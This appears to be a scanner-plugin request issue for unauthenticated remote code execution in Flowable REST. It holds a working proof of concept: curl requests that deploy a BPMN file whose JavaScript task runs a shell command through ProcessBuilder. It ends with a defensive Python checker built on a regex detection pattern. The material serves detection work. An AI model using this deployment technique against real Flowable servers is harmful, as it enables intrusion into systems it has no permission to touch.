Labels: Contributor main, PRP:Accepted
Description
- Identifier of the vulnerability: None
- Affected software: flowable
- Type of vulnerability: RCE
- Requires authentication: No
- Language you would use for writing the plugin: Templated
- Resources: https://github.com/flowable/flowable-engine
Users can create deployments including bash scripts with the Flowable REST API.

Here is how we can do the exploitation quickly:

```bash
docker run -p 127.0.0.1:8080:8080 flowable/flowable-rest

curl -X POST \
  'http://localhost:8080/flowable-rest/service/repository/deployments' \
  -H 'Content-Type: multipart/form-data' \
  -H "Authorization: Basic cmVzdC1hZG1pbjp0ZXN0" \
  -F 'file=@jsScript.bpmn'

curl -X POST \
  'http://localhost:8080/flowable-rest/service/runtime/process-instances' \
  -H 'Content-Type: application/json' \
  -H "Authorization: Basic cmVzdC1hZG1pbjp0ZXN0" \
  -d '{
    "processDefinitionKey": "jsScriptProcess"
  }'
```

Now you can see the output of the `uname -a` command.

Attachment:

jsScript.bpmn file:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<definitions xmlns="http://www.omg.org/spec/BPMN/20100524/MODEL"
             xmlns:flowable="http://flowable.org/bpmn"
             targetNamespace="Examples">
  <process id="jsScriptProcess" name="JavaScript Script Process">
    <startEvent id="start" />
    <sequenceFlow sourceRef="start" targetRef="scriptTask" />
    <scriptTask id="scriptTask" name="Execute Command via JavaScript"
                scriptFormat="javascript"
                flowable:autoStoreVariables="true">
      <script>
        var ProcessBuilder = Java.type('java.lang.ProcessBuilder');
        var Arrays = Java.type('java.util.Arrays');
        var Scanner = Java.type('java.util.Scanner');
        var processBuilder = new ProcessBuilder(Arrays.asList('uname', '-a'));
        var process = processBuilder.start();
        var scanner = new Scanner(process.getInputStream()).useDelimiter("\\A");
        var result = scanner.hasNext() ? scanner.next() : "";
        execution.setVariable('commandOutput', result);
      </script>
    </scriptTask>
    <sequenceFlow sourceRef="scriptTask" targetRef="end" />
    <endEvent id="end" />
  </process>
</definitions>
```
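
A defender-side check for the deployment described above, added here as an example and not code from the issue or from Flowable: it lists every `scriptTask` in a BPMN file and flags scripts that reference JVM or OS access. The marker list, the `audit_bpmn` name and the sample XML are assumptions constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

BPMN = "{http://www.omg.org/spec/BPMN/20100524/MODEL}"

# Heuristic markers (assumed for this example, not exhaustive) of a script
# that leaves the process engine to reach JVM classes or the host OS.
HOST_ACCESS = re.compile(
    r"Java\.type\s*\(|Packages\.|java\.lang\.(?:ProcessBuilder|Runtime)"
    r"|getRuntime\s*\(|\.exec\s*\("
)

def audit_bpmn(xml_text):
    """Return one finding per <scriptTask>; host_access lists matched markers."""
    # BPMN needs no DTD; refusing one avoids entity-expansion tricks in review tooling.
    if "<!DOCTYPE" in xml_text or "<!ENTITY" in xml_text:
        raise ValueError("DTD or entity declarations are not accepted")
    root = ET.fromstring(xml_text)
    findings = []
    for process in root.iter(BPMN + "process"):
        for task in process.iter(BPMN + "scriptTask"):
            body = task.findtext(BPMN + "script") or ""
            findings.append({
                "process": process.get("id"),
                "task": task.get("id"),
                "format": task.get("scriptFormat"),
                "host_access": sorted({m.group(0) for m in HOST_ACCESS.finditer(body)}),
            })
    return findings

# Constructed sample: one harmless script task and one that loads a JVM class.
SAMPLE = """
<definitions xmlns="http://www.omg.org/spec/BPMN/20100524/MODEL" targetNamespace="Examples">
  <process id="demo">
    <scriptTask id="calc" scriptFormat="javascript">
      <script>execution.setVariable('total', 1 + 2);</script>
    </scriptTask>
    <scriptTask id="shell" scriptFormat="javascript">
      <script>var PB = Java.type('java.lang.ProcessBuilder');</script>
    </scriptTask>
  </process>
</definitions>
""".strip()

if __name__ == "__main__":
    for f in audit_bpmn(SAMPLE):
        print("REVIEW" if f["host_access"] else "ok", f)
```

String matching is easy to evade with obfuscated scripts, so treat a clean result as triage only and restrict who can reach the deployment endpoint.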